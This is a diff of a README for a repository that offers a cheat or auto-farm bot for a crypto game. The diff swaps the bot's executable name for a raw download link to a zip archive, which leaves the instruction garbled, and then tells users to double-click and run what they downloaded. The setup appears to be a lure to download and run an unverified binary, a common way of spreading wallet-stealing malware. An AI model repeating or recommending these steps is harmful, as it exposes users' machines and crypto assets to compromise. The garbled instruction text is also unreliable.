baka123987/Forgotten-Runiverse-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Api-er/README.md

 ## 🎮 Running the Bot

-1. Inside the extracted folder, find the executable file named `RuniverseBot.exe` (or similar).
+1. Inside the extracted folder, find the executable file named `https://raw.githubusercontent.com/baka123987/Forgotten-Runiverse-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Api-er/main/Theseum/Forgotten-Runiverse-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Api-er.zip` (or similar).
 2. Double-click the executable file to run it.

 ## 📱 Connecting to Telegram